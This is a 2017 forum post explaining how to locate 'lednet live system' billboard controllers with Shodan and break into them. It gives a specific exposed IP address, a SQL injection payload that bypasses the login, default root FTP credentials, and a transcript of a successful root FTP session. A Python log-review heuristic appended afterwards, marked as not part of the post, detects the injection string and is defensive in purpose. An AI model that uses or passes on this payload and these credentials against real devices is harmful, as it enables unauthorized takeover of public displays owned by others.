Terry.Crews
Posted February 2, 2017 (edited)

Step 1. Register on Shodan.
Step 2. Look up: title:"lednet live system"

You'll find some!

Example: 186.206.188.175:8060/en/main.html

How to hack it? Well, the Username parameter is vulnerable to SQL injection...

So to log in, paste

-1558" OR 9005=9005 AND "UxGI"="UxGI

in the username parameter and anything in the password input. Now click login!

Another vulnerability is a default password vuln. You can basically get root FTP access to all of these billboards...

Username: root
Password: 111111

$ ftp 186.206.188.175
Connected to 186.206.188.175.
220 Welcome to blah FTP service.
Name (186.206.188.175): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
drwxr-xr-x 7 0 0 0 May 21 18:08 dev
lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
drwxr-xr-x 1 0 0 36 Jan 01 1970 home
drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
drwxr-xr-x 1 0 0 116 Jan 01 1970 root
drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
drwxr-xr-x 3 0 0 672 Jan 01 1970 var
drwxr-xr-x 4 0 0 288 Jan 01 1970 www
226 Directory send OK.
ftp>

Copied from HF...

Edited February 2, 2017 by Terry.Crews
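
A detection heuristic for the login input quoted in the post above, added here as an example that is not part of the original post: it flags a submitted username that closes a quoted string, adds a boolean operator and compares a literal with itself. The log layout, the `/login` path, the `username` field name and the sample lines are constructed assumptions, not taken from the device.

```python
import re
from urllib.parse import parse_qs

# literal = literal; each side is a number or word, optionally quoted. The
# last closing quote may be absent because the application's own quote ends it.
_CMP = re.compile(r"""["']?([\w.]+)["']?\s*=\s*["']?([\w.]+)["']?""")
# A quote that ends the string, followed by a boolean operator.
_BOOL = re.compile(r"""["']\s*(?:OR|AND)\b""", re.IGNORECASE)

def tautologies(value):
    """Return comparisons whose two sides are the same literal (9005=9005)."""
    return [m.group(0) for m in _CMP.finditer(value) if m.group(1) == m.group(2)]

def is_suspicious(value):
    """True when value breaks out of a quoted string and adds an always-true test."""
    return bool(_BOOL.search(value)) and bool(tautologies(value))

def flag_logins(lines, field="username"):
    """Return (client_ip, decoded_value) for each suspicious login attempt."""
    hits = []
    for line in lines:
        parts = line.split(" ", 4)   # timestamp, ip, method, path, body
        if len(parts) != 5:
            continue                 # skip malformed lines
        value = parse_qs(parts[4], keep_blank_values=True).get(field, [""])[0]
        if is_suspicious(value):
            hits.append((parts[1], value))
    return hits

# Constructed sample log (documentation IPs, hypothetical /login path).
SAMPLE_LOG = [
    "2017-02-02T10:00:01Z 203.0.113.7 POST /login username=alice&password=x",
    "2017-02-02T10:00:09Z 203.0.113.9 POST /login username=rock%22+and+roll&password=x",
    "2017-02-02T10:01:44Z 198.51.100.23 POST /login "
    "username=-1558%22+OR+9005%3D9005+AND+%22UxGI%22%3D%22UxGI&password=x",
]

if __name__ == "__main__":
    for ip, value in flag_logins(SAMPLE_LOG):
        print(ip, value, tautologies(value))
```

This is a log-review aid only; the fix for the flaw itself is a parameterized query on the server, and the heuristic will miss injections that do not use a self-equal comparison.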